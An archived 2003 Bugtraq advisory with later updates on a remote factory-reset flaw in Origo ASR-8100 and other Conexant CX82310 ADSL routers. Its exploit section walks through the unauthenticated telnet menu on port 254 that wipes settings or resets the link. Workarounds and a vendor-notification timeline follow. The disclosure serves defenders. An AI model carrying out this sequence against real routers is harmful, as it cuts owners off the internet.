The following is an updated version of the vulnerabilities I found in ADSL routers based on the CX82310 chip from Conexant. My test device was an Origo ASR-8100, but there are other routers based on this chipset, which run vxWorks.
Original Bugtraq posting
(not reformatted so PGP signature isn't broken)
From theo@markettos.org.uk Sun Oct 12 19:03:43 2003 Date: Sun, 12 Oct 2003 19:03:43 +0100 From: Theo Markettos <theo@markettos.org.uk> To: bugtraq@securityfocus.com Subject: Origo ASR-8100 ADSL router remote factory reset Message-ID: <20031012180343.GB15863@chiark.greenend.org.uk> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="uQr8t48UFsdbeI+V" Content-Disposition: inline User-Agent: Mutt/1.3.28i X-PGP-Key: http://www.chiark.greenend.org.uk/~theom/pubkey.asc Status: RO Content-Length: 4279 Lines: 144 --uQr8t48UFsdbeI+V Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Vulnerable device ----------------- Origo ASR-8100 ADSL router Firmware ETHADSL_USB_110502_REL10_S Customer Software Version 110502_REL10_S ADSL Showtime Firmware Version: 3.21 device based on Conexant CX82310-14 chipset Vulnerability: Remote ADSL reset and permanent denial of service attack ----------------------------------------------------------------------- The following device is able to be remotely reset to factory settings, allowing a permanent denial of service attack until reconfigured manually by an operator. The attack only takes place after the device is reset - which may be some time after it has been performed. PPP authentication information is lost on reset to factory settings, so it is most likely that the device will be unable to establish a WAN link after reset. The ADSL link can also be remotely reset, causing temporary DoS and (if DHCP is used) its IP address to be changed. Attack overview --------------- A telnet-style configuration interface is left open to WAN interface on port 254, without a password being set. This menu system is very easily driven by a remote attacker. A full exploit is given below. Workaround ---------- Forwarding external port 254 to an internal port that is unused prevents access to the configuration interface. With the web configuration interface at http://router-ip/doc/advance.htm click on Configuration: Virtual server Enter a new entry: Public port: 254 Private port: 9876 TCP Host IP address: 127.0.0.1 Click 'Add this setting', then do Configuration: Save Settings/Reboot and click 'Save & Reboot' Exploit details --------------- =46rom any Internet connected host: telnet254 Returns a menu: 01/01/99 CONEXANT SYSTEMS, INC.=20 00:04:10 ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21 = =20 =20 You are prompted for a LOGIN PASSWORD> Just press return Brings up MAIN MENU 1. SYSTEM STATUS AND CONFIGURATION 2. ADSL MENU =20 4. REMOTE LOGON =20 Press 1 - get to SYSTEM STATUS AND CONFIGURATION 1. SYSTEM INFORMATION 2. SYSTEM CONFIGURATION Press 2 - get to SYSTEM CONFIGURATION 1. CHANGE SYSTEM TIME 2. CHANGE SYSTEM DATE 3. CHANGE PASSWORD 4. FACTORY DEFAULT CONFIGURATION Type 1 hh:mm:ss to reset the system time Type 2 dd/mm/yy to reset the system date (Option 3 doesn't seem to work) Type 4: Prompt: This will reset all the configurations and the ADSL modem. Are you sure?(Y/N) Type Y: Message: NVRAM updated This does not reset the ADSL modem, only clears the NVRAM. This takes effect the next time the modem is reset: the admin password is reset to that printed in the documentation, and the ADSL username/password are reset, meaning the connection is down permanently until a human sets them up again. Any other settings (security etc) are also lost. =46rom main menu, type 2 to get to ADSL MENU 1. ADSL PERFORMANCE STATUS 2. 24 HOUR ADSL PERFORMANCE HISTORY 3. 7 DAY ADSL PERFORMANCE HISTORY 4. ADSL ALARM HISTORY 5. ADSL TRANSCEIVER CONFIGURATION MENU 6. ADSL LINK RESET Type 6: Prompt: This will bring down the ADSL link. Are you sure(Y/N)? Type Y. The ADSL link is reset and a new WAN IP address is requested by DHCP (if the ISP uses it). Vendor notification ------------------- UK support for Vendor (support@adsltech.com) was notified on 30th August 2003 - entirety of reply message was 'Thanks a lot'. Vendor doesn't advertise an email address so were notified via web form on that date - no response received. To date the vendor has not advertised any patches or new firmware. --=20 Theo Markettos theo@markettos.org.uk Clare Hall, Cambridge theom@chiark.greenend.org.uk CB3 9AL, UK http://www.markettos.org.uk/ --uQr8t48UFsdbeI+V Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE/iZd/+ASNqdJKcxMRAlE2AJ9q/jpW178eHqeuD1li2cRUmvJUmgCgqqjN J9mAoV0MhjAzln8P0y9FvkE= =IOQE -----END PGP SIGNATURE----- --uQr8t48UFsdbeI+V--
Further updates
Chris Drake writes:
Date: Wed, 11 Feb 2004 23:28:04 +1100 From: Chris Drake Message-ID: <6850315687.20040211232804@pobox.com> To: theo@markettos.org.uk Subject: Correction for: Remote Origo ASR-8100 ADSL Reset and Permanent Denial of Service Attack Hi Theo, Your article here:- http://www.securiteam.com/securitynews/6Y00N0U8KG.html Contains some incorrect information. Specifically - the bit:- 3. CHANGE PASSWORD (Option 3 doesn't work) The password can actually be set. Here is how:- 1. telnet to the device. 2. push <ctrl-]> to bring up the telnet menu 3. type:- mode character <enter> 4. go to the password change menu, and change the password, but DONT use the <enter> key - instead - use <ctrl-J> eg: to set the default password (from an insecure shipped product that already has no password in it, the user needs to push these buttons in order (being careful not to press <enter> at all):- 1 2 3 <ctrl-J> newpassword <ctrl-J> newpassword <ctrl-J> ----------------------------------------------------------------------- Secondly - the "workaround" you describe only works when the user has NAT turned on. If (like me) the user has multiple "real" internet IP addresses, port-forwarding cannot be switched on (it does nothing, of course, since port-forwarding without NAT makes no sense). So - my above fix is necessary for these people. Finally - you make no mention of port 255. Like 254, this port is also open and accepts device connections. Unlike port 254, it's not a character session, so this "undocumented" interface could be doing anything - and probably is doing stuff that doesn't need passwords to mess up your modem :-( I thought you might like to update your page, since it's top in Google for these kinds of problems. It's not restricted to the model of ADSL device you mention - there are dozens of different brands running the same software all with the same problem... Kind Regards, Chris Drake
http://adsltech.7host.com/forum/forum_posts.asp?TID=146&PN=1 also has some different advice on locking down the router - I have not tried this. Apparently the new firmware from Origo fixes this vulnerability.
Page by Theo Markettos (email at theo [at@] markettos.org.uk), last modified 2004-02-12
Return to front page.